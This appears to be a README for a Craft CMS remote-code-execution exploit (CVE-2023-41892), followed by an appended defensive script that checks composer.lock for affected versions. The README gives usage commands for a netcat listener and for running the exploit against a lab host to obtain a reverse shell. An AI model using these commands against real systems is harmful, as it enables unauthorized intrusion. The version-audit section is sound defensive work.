This Python script exploits the remote code execution vulnerability (CVE-2023-41892) in Craft CMS, a popular content management system. Versions 4.0.0-RC1 through 4.4.14 are affected; the vulnerability allows attackers to execute arbitrary code remotely, such as a PHP reverse shell.
First start a netcat listener in another shell:
nc -nlvp 1234
Then check your IP address and run the exploit:
python3 exploit.py -r 10.10.16.47 -p 1234 http://surveillance.htb
Happy hacking with your brand new reverse shell!
This code is intended for ethical hacking purposes only and should not be used for any malicious activities!
Thanks to to016 for the original code, which can be found in this Gist.
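
To check from the defender's side whether an installation falls in the affected range stated above (4.0.0-RC1 through 4.4.14), the version pinned in the site's composer.lock can be compared against that range. This is an added example, not part of the original exploit script or of Craft CMS; it assumes Craft is installed through Composer as the `craftcms/cms` package, and the sample lock content is constructed.

```python
import json
import re

# Affected range as stated on this page: 4.0.0-RC1 through 4.4.14 inclusive.
AFFECTED_MIN = "4.0.0-RC1"
AFFECTED_MAX = "4.4.14"

_STAGES = {"alpha": 0, "beta": 1, "rc": 2, "": 3}  # "" means stable release
_VERSION_RE = re.compile(
    r"^v?(\d+)\.(\d+)\.(\d+)(?:-(alpha|beta|rc)\.?(\d*))?$", re.IGNORECASE
)

def version_key(version):
    """Return a sortable tuple; pre-releases sort before the stable release."""
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    major, minor, patch, stage, num = m.groups()
    return (int(major), int(minor), int(patch),
            _STAGES[(stage or "").lower()], int(num or 0))

def is_affected(version):
    """True if the version lies inside the range given on this page."""
    return version_key(AFFECTED_MIN) <= version_key(version) <= version_key(AFFECTED_MAX)

def craft_version_from_lock(lock_text):
    """Find the craftcms/cms version in composer.lock content, or None."""
    lock = json.loads(lock_text)
    for pkg in lock.get("packages", []):
        if pkg.get("name") == "craftcms/cms":
            return pkg.get("version")
    return None

def audit_lock(lock_text):
    """Classify a composer.lock as affected / not-affected / unknown / not-installed."""
    version = craft_version_from_lock(lock_text)
    if version is None:
        return "not-installed"
    try:
        return "affected" if is_affected(version) else "not-affected"
    except ValueError:
        return "unknown"  # e.g. a dev branch alias: review by hand

# Constructed sample composer.lock fragment, not taken from a real site.
SAMPLE_LOCK = json.dumps({"packages": [
    {"name": "yiisoft/yii2", "version": "2.0.48.1"},
    {"name": "craftcms/cms", "version": "4.4.14"},
]})

if __name__ == "__main__":
    print(audit_lock(SAMPLE_LOCK))
```

An "unknown" result means the pinned version string is not a plain release or pre-release tag and should be checked manually.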